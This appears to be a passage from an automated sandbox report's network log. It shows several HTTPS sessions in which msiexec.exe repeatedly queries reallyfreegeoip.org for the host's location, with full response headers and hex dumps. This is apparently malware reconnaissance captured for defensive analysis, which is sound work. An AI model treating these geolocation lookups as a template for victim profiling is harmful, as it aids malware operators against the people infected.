                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.949887172.67.177.1344437192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-24 10:28:28 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-12-24 10:28:29 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:28 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 362
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Age: 350898
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X2akIFWlM2dBdObFMIGNhDsvbnH4gcOk43nqyR0BoIKiLOz55CYVb7QSX%2FbAVgGOhVCe3001lZfLkmBZeN9dh5pAqlxeMkAD68hccqf%2Bb9QAN75EVYADwDhwTtDNY2DEQV2ZL%2FS4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f6fe7a0ea8a7d20-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1991&rtt_var=757&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1437007&cwnd=207&unsent_bytes=0&cid=777f560eba982ae4&ts=451&x=0"
                                                                                                                                                                    2024-12-24 10:28:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.949893172.67.177.1344437192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-24 10:28:30 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    2024-12-24 10:28:31 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:31 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 362
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Age: 350900
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RfGDS0xwSE4W%2F87Q3eVvSQFD44NmDHp4YWeA6SLlmEkeB2fa0%2Bt2RaAyP2CKbxXUaCj1BPUsvYwKDVZBLVxnsQhOHdT45cLX1LfIpu1XdzVu8xDjE6k6kT8WqVEMes%2F6idzmok%2Fl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f6fe7adffb98cda-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1935&rtt_var=732&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1489795&cwnd=242&unsent_bytes=0&cid=80a3e7dc360ad1cf&ts=453&x=0"
                                                                                                                                                                    2024-12-24 10:28:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.949901172.67.177.1344437192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-24 10:28:33 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-12-24 10:28:34 UTC852INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:34 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 362
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Age: 350903
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lCge3z9PFVDL0k9BJypdCVbZKDH51TaUcD0F%2FZupyRaNrdrszDdx5V2wmwm6d1spO%2FQEXyL5iGgn9wV2NCDcBz66MhvdG01NVmTtiqJRYWfASZrCF2LuLbfgmv1ktj1a0Zts68IV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f6fe7c11c7241ed-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2485&min_rtt=2480&rtt_var=940&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1158730&cwnd=211&unsent_bytes=0&cid=7f781761532a6733&ts=453&x=0"
                                                                                                                                                                    2024-12-24 10:28:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.949912172.67.177.1344437192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-24 10:28:36 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-12-24 10:28:37 UTC860INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:37 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 362
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Age: 350906
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eqk3FBll33NZj327x%2BvbXYBlpFyPRXcLpqU%2F47CnYBtfFCysihgS3n%2BkFDnN4aosKBjxSt5%2BUmoRAzyIL%2BoA0GzR70tlRl9peAV4IcfJGjVG9BAolo0hENU06zz4UtVajRhGjnH%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f6fe7d42e5e8cb1-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1948&rtt_var=748&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1445544&cwnd=186&unsent_bytes=0&cid=bea837ac4d13188f&ts=451&x=0"
                                                                                                                                                                    2024-12-24 10:28:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.949920172.67.177.1344437192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-24 10:28:39 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-12-24 10:28:40 UTC860INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:40 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 362
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Age: 350909
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gSXw8S%2FQlLvND4bodJyqTaDoa2Wzh8gKdzC2TF%2FevTpfniK%2FmqZxs4SriZkSAI0gnYuNjBhBHDDB6KrUQKiPg%2B3%2FPJn9hcaPdihqTV98I2krljMLWM3N1%2FUCrP0rUJ330ZJmenbJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f6fe7e73b767c9a-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1759&rtt_var=687&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1563169&cwnd=189&unsent_bytes=0&cid=862a572396642580&ts=452&x=0"
                                                                                                                                                                    2024-12-24 10:28:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    7192.168.2.949930172.67.177.1344437192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-24 10:28:42 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    2024-12-24 10:28:43 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:43 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 362
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Age: 350912
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UOjkJuIIFN%2FxnqQKC4IEM9JpsX83aJc1dTzC5Xw4iNpPSh4rF5QM0upGzw7WN54K9hE12RxXZ6MbcLIcJ8ocD%2FsRVpCOlRgbIYBEXQOFBq%2BXfQZ5eEJk%2BxWF8z0LPgM6CS2jzi37"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f6fe7fa5fb3424b-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1581&rtt_var=626&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1704611&cwnd=248&unsent_bytes=0&cid=d8afc4affa5badc2&ts=454&x=0"
                                                                                                                                                                    2024-12-24 10:28:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    8192.168.2.949938172.67.177.1344437192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-24 10:28:46 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    2024-12-24 10:28:46 UTC860INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:46 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 362
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Age: 350915
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGj89ulfC72AxsddjIuqd0%2BDDojmr1iaTsM4OzzitzoWjID%2FgrV%2FfqyjlzqvbrazJqwSrn1V5550kXXiY3ALAF%2BMxuJiA4NCnvVMJrbDY1sWyw%2B4qywAYZKEqN%2BEplj6v163aTzi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f6fe80d98d50f59-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1455&min_rtt=1446&rtt_var=561&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1917268&cwnd=221&unsent_bytes=0&cid=63864643b58c58c0&ts=459&x=0"
                                                                                                                                                                    2024-12-24 10:28:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    9192.168.2.949947172.67.177.1344437192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-24 10:28:49 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    2024-12-24 10:28:49 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:49 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 362
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Age: 350918
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q8k0jyD3D2uOX3hLsJV%2BFE%2Fgl82icLmemGHIX6uD8GAi41629%2FDe4F7LLlfPTh368ayW0TzYcyXRnffQbbBOMl4uLlDevZTVwK%2BY6jTHTcKCjWvjamSbIozzcMe52eI8s2almczp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f6fe820b95943ad-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1528&rtt_var=587&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1839949&cwnd=203&unsent_bytes=0&cid=4a069a3e76eede76&ts=447&x=0"
                                                                                                                                                                    2024-12-24 10:28:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    10192.168.2.949957172.67.177.1344437192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-24 10:28:52 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-12-24 10:28:52 UTC858INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 24 Dec 2024 10:28:52 GMT
                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                    Content-Length: 362
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Age: 350921
                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thXtQMSgHbWV%2BUpN81G4YKQ5zJg8qAt71wHU0tzcR4x5XcPsdqHirg8bqVaN316LjyWIo6RyuJiP3DOLK8CHfMP4qyA%2Bh%2FayOXFT4zJn%2BbQSR95f%2BPXfMR8z5OWUp7mmGzrMiyka"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f6fe833b91641b5-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1678&rtt_var=647&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1669525&cwnd=207&unsent_bytes=0&cid=98d7c0b4ba4cec1a&ts=452&x=0"
